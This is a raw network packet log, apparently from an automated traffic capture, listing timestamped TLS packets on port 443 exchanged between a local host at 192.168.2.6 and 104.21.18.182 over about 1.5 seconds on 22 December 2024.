                                                                                                            Dec 22, 2024 13:42:21.205530882 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.205573082 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.210438967 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.210454941 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.210515022 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.210522890 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.210562944 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.363676071 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.363698959 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.363826036 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.363859892 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.363908052 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.369532108 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.369550943 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.369616985 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.369626045 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.369667053 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.375228882 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.375257969 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.375299931 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.375319958 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.375354052 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.375366926 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.381014109 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.381031036 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.381119967 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.381128073 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.381234884 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.386585951 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.386603117 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.386666059 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.386674881 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.386713982 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.391545057 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.391562939 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.391632080 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.391639948 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.391680002 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.397463083 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.397480965 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.397555113 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.397563934 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.397605896 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.403434038 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.403451920 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.403513908 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.403522015 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.403558016 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.557890892 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.557909012 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.558013916 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.558022976 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.558069944 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.563445091 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.563462973 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.563549042 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.563556910 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.563599110 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.568578005 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.568598032 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.568645000 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.568653107 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.568695068 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.568695068 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.573179007 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.573196888 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.573276997 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.573286057 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.573328972 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.578697920 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.578716040 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.578799963 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.578816891 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.578859091 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.584168911 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.584187984 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.584270000 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.584275961 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.584316969 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.589977026 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.590006113 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.590095043 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.590102911 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.590140104 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.595653057 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.595679998 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.595741034 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.595748901 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.595776081 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.595798969 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.748843908 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.748862028 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.748965025 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.748972893 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.749138117 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.753956079 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.753973007 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.754038095 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.754051924 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.754087925 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.754121065 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.759747028 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.759763002 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.759828091 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.759843111 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.759879112 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.765434980 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.765451908 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.765494108 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.765501976 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.765566111 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.765566111 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.770544052 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.770561934 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.770617008 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.770626068 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.770659924 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.771009922 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.776633024 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.776652098 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.776736975 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.776743889 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.776786089 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.781680107 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.781698942 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.781757116 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.781765938 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.781804085 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.787719011 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.787741899 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.787811995 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.787821054 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.787862062 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.941169977 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.941190958 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.941258907 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.941267014 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.941302061 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.946058035 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.946075916 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.946188927 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.946196079 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.946243048 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.951817036 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.951833963 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.951932907 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.951941967 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.951986074 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.957591057 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.957608938 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.957676888 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.957685947 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.957726955 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.961709023 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.961741924 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.961765051 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.961772919 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.961815119 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.967236042 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.967253923 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.967302084 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.967308998 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.967360020 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.972937107 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.972954988 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.973022938 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.973030090 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.973071098 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.978240013 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.978257895 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.978332996 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:21.978339911 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:21.978383064 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.132082939 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.132102966 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.132169008 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.132184029 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.132230043 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.137300014 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.137316942 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.137387991 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.137397051 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.137435913 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.142396927 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.142415047 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.142478943 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.142488003 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.142527103 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.148211002 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.148226023 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.148292065 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.148300886 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.148339987 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.154007912 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.154025078 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.154083014 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.154090881 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.154131889 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.159347057 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.159363985 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.159410954 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.159419060 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.159452915 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.159478903 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.165136099 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.165153027 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.165211916 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.165219069 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.165263891 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.170370102 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.170387030 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.170444965 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.170453072 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.170494080 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.324168921 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.324197054 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.324260950 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.324273109 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.324326038 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.329807997 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.329827070 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.329885006 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.329900980 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.329927921 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.329946995 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.335247040 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.335266113 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.335370064 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.335385084 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.335434914 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.340363026 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.340379953 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.340511084 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.340527058 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.340583086 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.346120119 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.346138954 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.346244097 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.346259117 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.346359015 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.359242916 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.359266043 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.359349966 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.359366894 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.359394073 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.359411001 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.359823942 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.359841108 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.359906912 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.359920979 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.359997034 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.363538980 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.363555908 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.363622904 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.363631964 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.363676071 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.516339064 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.516365051 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.516462088 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.516484022 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.516545057 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.521430969 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.521450043 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.521531105 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.521544933 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.521689892 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.527307034 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.527328014 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.527407885 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.527422905 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.527483940 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.532921076 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.532941103 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.533011913 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.533025980 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.533267975 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.538743019 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.538759947 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.538819075 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.538834095 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.538886070 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.544179916 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.544197083 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.544266939 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.544284105 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.544347048 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.549243927 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.549259901 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.549331903 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.549346924 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.549396992 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.555286884 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.555305004 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.555377007 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.555392027 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.555449009 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.708456039 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.708476067 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.708554029 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.708569050 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.708631039 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.708631039 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.713612080 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.713628054 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.713702917 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.713717937 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.713778019 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.719480038 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.719496965 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.719566107 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.719574928 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.719625950 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.725107908 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.725125074 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.725188017 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.725197077 CET44349720104.21.18.182192.168.2.6
                                                                                                            Dec 22, 2024 13:42:22.725231886 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.725256920 CET49720443192.168.2.6104.21.18.182
                                                                                                            Dec 22, 2024 13:42:22.730227947 CET44349720104.21.18.182192.168.2.6
